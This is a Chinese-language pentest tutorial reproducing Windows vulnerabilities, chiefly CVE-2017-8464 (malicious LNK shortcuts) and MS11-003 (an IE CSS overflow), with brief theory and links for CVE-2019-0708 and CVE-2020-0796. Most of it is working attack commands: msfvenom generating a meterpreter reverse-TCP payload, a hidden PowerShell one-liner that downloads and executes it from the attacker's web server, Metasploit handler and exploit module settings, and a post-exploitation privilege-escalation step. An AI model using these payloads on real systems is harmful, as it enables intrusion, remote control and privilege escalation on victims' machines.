目錄
- 什么是組件
- 1.CVE-2017-8464
- 原理
- 復現
- 環境部署
- 遠程監聽
- 2.MS11_003 溢位漏洞
- 原理
- 復現
- 下一步提權
- 3.CVE-2019-0708
- 4.CVE-2020-0796(永恒之黑)
- 5.…………………………
什么是組件
組件一般都是系統自帶都有的, 如:WINXP或WIN2000它本身,就帶有非常強大的組件功能,添加組件可以使系統的功能更加強大,
具體方式:
控制面板--添加或洗掉程式--添加/洗掉組件
1.CVE-2017-8464
原理
Windows系統使用二進制決議 .LNK檔案,當惡意二進制代碼被系統識別執行時即可實作遠程代碼執行,由于是在explorer.exe行程中運行,所以 load 進記憶體時與當前用戶具有相同權限
復現
環境部署
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.0.102 lport=5555 -f psh-reflection>/opt/search.ps1 #生成shell反彈木馬
mv search.ps1 /var/www/html #木馬移動到/var/www/html
service apache2 start #啟動服務
powershell -windowstyle hidden -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://192.168.0.102/search.ps1');test.ps1" #創建快捷件遠程加載
遠程監聽
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
show options
set LHOST 192.168.0.102
set lport 5555
exploit
2.MS11_003 溢位漏洞
原理
溢位漏洞是由于程式中的某個或某些輸入函式(使用者輸入引數)對所接收資料的邊界驗證不嚴密而造成,
根據程式執行中堆疊呼叫原理,程式對超出邊界的部分如果沒有經過驗證自動去掉,那么超出邊界的部分就會覆寫后面的存放程式指標的資料,當執行完上面的代碼,程式會自動呼叫指標所指向地址的命令,
復現
search ms11_003
use exploit/windows/browser/ms11_003_ie_css_import
set payload windows/meterpreter/reverse_tcp
set srvhost
set lhost 192.168.0.102
set uripath 00
Run
sessions
下一步提權
use post/multi/recon/local_exploit_suggester
set LHOST 192.168.0.102
set SESSION 1
Exploit
3.CVE-2019-0708
可參考:
https://blog.csdn.net/yumengzth/article/details/102768945?utm_medium=distribute.pc_relevant.none-task-blog-title-7&spm=1001.2101.3001.4242
4.CVE-2020-0796(永恒之黑)
https://blog.csdn.net/PigLL/article/details/108012981
5.…………………………
轉載請註明出處,本文鏈接:https://www.uj5u.com/shujuku/92404.html
標籤:其他